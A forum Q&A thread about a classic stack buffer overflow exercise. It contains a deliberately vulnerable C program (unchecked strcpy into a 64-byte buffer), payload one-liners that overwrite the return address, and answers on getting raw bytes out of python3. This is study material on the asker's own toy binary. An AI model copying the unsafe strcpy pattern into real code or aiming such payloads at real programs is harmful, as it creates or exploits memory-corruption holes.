6

I'm trying to exploit a simple buffer overflow with gdb and peda, I just want to rewrite the return address with the address of a function of the program. I can easily do it with python2 but it seems to be impossible with python3, the return address is not rewritten with a correct address.

According to the research that I have already done, the encoding is the cause of this problem because python2 is using ascii and python3 is using utf-8. I found some stuff on this website which didn't help me :/

Here is the code of the vulnerable app:

#include <stdio.h> #include <stdlib.h> #include <string.h> #include <string.h> void checkPassword(); void goodPassword(); int main(int argc, char **argv) { printf("Debut du programme...\n"); if (argc < 2) { printf("Necessite un argument\n"); return 0; } printf("Appel de la fonction checkPassword\n"); checkPassword(argv[1]); printf("Fin du programme\n"); } void checkPassword(const char *arg) { char password[64]; strcpy(password, arg); if (strcmp(password, "fromage") == 0) { goodPassword(); } else { printf("Mauvais mot de passe\n"); } } void goodPassword() // This is the function I want to run, address : 0x565562b2 { printf("Mot de passe correcte!\n"); } 

Here is the exploit I use in python2

starti $(python2 -c 'print "A"*76 + "\xb2\x62\x55\x56".strip() ') 

Here is the exploit I use in python3 and the stack atfer the strcpy:

starti $(python3 -c 'print(b"A"*76 + b"\xb2\x62\x55\x56".strip() ') gdb-peda$ x/24xw $esp 0xffffcc40: 0xffffcc50 0xffffcfa6 0xf7e2bca9 0x56556261 0xffffcc50: 0x41412762 0x41414141 0x41414141 0x41414141 0xffffcc60: 0x41414141 0x41414141 0x41414141 0x41414141 0xffffcc70: 0x41414141 0x41414141 0x41414141 0x41414141 0xffffcc80: 0x41414141 0x41414141 0x41414141 0x41414141 0xffffcc90: 0x41414141 0x41414141 0x41414141 0x785c4141 

I expect this output:

gdb-peda$ x/24xw $esp 0xffffcc50: 0xffffcc60 0xffffcfac 0xf7e2bca9 0x56556261 0xffffcc60: 0x41414141 0x41414141 0x41414141 0x41414141 0xffffcc70: 0x41414141 0x41414141 0x41414141 0x41414141 0xffffcc80: 0x41414141 0x41414141 0x41414141 0x41414141 0xffffcc90: 0x41414141 0x41414141 0x41414141 0x41414141 0xffffcca0: 0x41414141 0x41414141 0x41414141 0x565562b2 

which works fine and run the goodPassword function. Thanks for help

    2 Answers 2

    1

    What is starti? Is this a wrapper script around gdb/peda? By what means is the string being generated by python3 being passed to the vulnerable application? Is the shell involved in the middle?

    We expect:

    python -c 'print("\x48\x49\x90\x84\xe3\xe9")' |xxd 0000000: 4849 9084 e3e9 0a HI..... 

    But instead python3 gives us:

    python3 -c 'print(str(b"\x48\x49\x90\x84\xe3\xe9","latin-1"))' |xxd 0000000: 4849 c290 c284 c3a3 c3a9 0a HI......... 

    ...which is functionally equivalent to:

    python3 -c 'import codecs; print(codecs.decode(b"\x48\x49\x90\x84\xe3\xe9","latin-1"))' |xxd 0000000: 4849 c290 c284 c3a3 c3a9 0a HI......... 

    ...and additionally

    python3 -c 'import codecs; print("".join(chr(x) for x in bytearray("\x48\x49\x90\x84\xe3\xe9".encode("latin-1"))))' |xxd 0000000: 4849 c290 c284 c3a3 c3a9 0a HI......... 

    ... according to the set of answers provided in the discussion on this link.

    While python3 requires a character encoding to be passed in order for it to know how the non-ascii-character range is to be handled, the print() function passes the output off to the shell, which is still left to interpret using UTF-8. An informative explanation of this behavior is provided in this answer. In summary, much of this seeming behavioral regression can be tracked to the single decision to move from print "something" to print("something") (builtin print function), removing print from the compiler discussed here. Albeit this is a result of python3 changing the default behavior of strings to bytes, more information here.

    However, I'd like to point out that if you can somehow pass your exploit buffer to your vulnerable application without having to involve the shell in between both python and your victim app, you will get the bytes you desire from all three above python3 examples.

    A good verification of this is to write to an outfile, and perform a hexdump on the output file. The same would theoretically be true for passing the exploit buffer through a socket connection (?)

    #!/usr/bin/env python3 import os, sys sploit = "\x48\x49\x90\x84\xe3\xe9" with open("evil.txt","wb") as F: F.write(sploit.encode('latin-1')) F.close() 

    ...and proof:

    hexdump -C evil.txt 00000000 48 49 90 84 e3 e9 |HI....| 00000006 

    Python2 is of course much easier to write exploits with than python3 for all of these reasons. And of course, if ever there is a problem with running (or even installing/making available) python2 in the future, we still have a number of other mainstay languages, such as perl:

    perl -e 'print "A"x4 . "\x48\x49\x90\x84\xe3\xe9";' |xxd 0000000: 4141 4141 4849 9084 e3e9 AAAAHI.... 
      1

      from here it appears to possible to bypass some issues with python3 print() using

      import sys sys.stdout.buffer.write(b"some binary data") 

      by writing directly to stdout which works in linux but may have issues in windows

        You must log in to answer this question.

        Start asking to get answers

        Find the answer to your question by asking.

        Ask question

        Explore related questions

        See similar questions with these tags.